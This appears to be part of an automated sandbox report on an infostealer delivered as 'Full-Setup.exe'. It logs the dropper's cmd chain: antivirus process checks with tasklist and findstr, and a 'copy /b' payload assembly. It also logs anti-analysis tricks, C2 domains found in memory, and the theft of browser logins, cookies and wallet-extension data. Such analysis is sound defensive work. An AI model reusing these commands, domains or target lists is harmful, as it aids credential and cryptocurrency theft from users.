        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comSystem information queried: FirmwareTableInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2303Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1090Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comAPI coverage: 3.9 %
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.com TID: 7944Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8168Thread sleep count: 2303 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8168Thread sleep count: 1090 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8188Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\Full-Setup.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
        Source: C:\Users\user\Desktop\Full-Setup.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003EDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_003EDC54
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003FA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_003FA087
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003FA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_003FA1E2
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003EE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_003EE472
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003FA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_003FA570
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003BC622 FindFirstFileExW,10_2_003BC622
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003F66DC FindFirstFileW,FindNextFileW,FindClose,10_2_003F66DC
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003F7333 FindFirstFileW,FindClose,10_2_003F7333
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003F73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_003F73D4
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003ED921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_003ED921
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_00385FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00385FC8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\600044Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\600044\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003FF4FF BlockInput,10_2_003FF4FF
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_0038338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_0038338B
        Source: C:\Users\user\Desktop\Full-Setup.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003A5058 mov eax, dword ptr fs:[00000030h]10_2_003A5058
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003E20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,10_2_003E20AA
        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003B2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_003B2992
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003A0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_003A0BAF
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003A0D45 SetUnhandledExceptionFilter,10_2_003A0D45
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003A0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_003A0F91

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: Glow.com, 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: debonairnukk.xyz
        Source: Glow.com, 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: diffuculttan.xyz
        Source: Glow.com, 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: effecterectz.xyz
        Source: Glow.com, 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: deafeninggeh.biz
        Source: Glow.com, 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: immureprech.biz
        Source: Glow.com, 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: kitteprincv.click
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003E1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_003E1B4D
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_0038338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_0038338B
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003EBBED SendInput,keybd_event,10_2_003EBBED
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003EEC6C mouse_event,10_2_003EEC6C
        Source: C:\Users\user\Desktop\Full-Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Spare Spare.cmd && Spare.cmdJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 600044Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Mary" Exploring Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Cancel + ..\Mag + ..\Investment + ..\Pee + ..\Condition + ..\Shopzilla + ..\Mention kJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\600044\Glow.com Glow.com kJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003E14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_003E14AE
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003E1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_003E1FB0
        Source: Glow.com, 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmp, Glow.com, 0000000A.00000003.2164760274.0000000004F25000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Encyclopedia.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
        Source: Glow.comBinary or memory string: Shell_TrayWnd
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003A0A08 cpuid 10_2_003A0A08
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003DE5F4 GetLocalTime,10_2_003DE5F4
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003DE652 GetUserNameW,10_2_003DE652
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003BBCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,10_2_003BBCD2
        Source: C:\Users\user\Desktop\Full-Setup.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
